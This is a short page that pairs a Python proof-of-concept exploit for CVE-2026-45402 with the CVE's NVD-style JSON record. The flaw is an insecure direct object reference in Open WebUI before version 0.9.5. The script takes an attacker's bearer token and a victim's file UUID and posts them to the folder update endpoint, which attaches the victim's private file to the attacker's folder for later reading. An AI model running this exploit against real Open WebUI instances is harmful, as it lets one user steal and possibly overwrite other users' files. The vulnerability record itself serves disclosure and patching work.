CVE-2026-45402

import requests # PoC for CVE-2026-45402: Open WebUI IDOR Vulnerability # This script demonstrates how an authenticated user can attach another user's file to their folder. TARGET_URL = "http://localhost:3000" ATTACKER_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." # Replace with valid JWT VICTIM_FILE_ID = "550e8400-e29b-41d4-a716-446655440000" # Replace with target file UUID ATTACKER_FOLDER_ID = "123e4567-e89b-12d3-a456-426614174000" # Replace with attacker's folder ID headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Exploit via /api/v1/folders/{id}/update url = f"{TARGET_URL}/api/v1/folders/{ATTACKER_FOLDER_ID}/update" payload = { "file_id": VICTIM_FILE_ID, "name": "Stolen File" } print(f"[*] Sending request to {url}...") response = requests.post(url, json=payload, headers=headers) if response.status_code == 200: print("[+] Success! File attached to attacker's folder.") print("[+] Attacker can now access the file content via RAG or download endpoints.") else: print(f"[-] Failed with status code {response.status_code}") print(response.text)

{"cve": {"id": "CVE-2026-45402", "sourceIdentifier": "[email protected]", "published": "2026-05-15T21:16:38.273", "lastModified": "2026-05-15T23:16:21.470", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file's content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user's private file — and on the knowledge-base path, also to overwrite it — given knowledge of the file's UUID. This affects backend/open_webui/routers/folders.py (POST /api/v1/folders/{id}/update), backend/open_webui/routers/knowledge.py (add_file_to_knowledge_by_id), and backend/open_webui/routers/knowledge.py (add_files_to_knowledge_by_id_batch). This vulnerability is fixed in 0.9.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}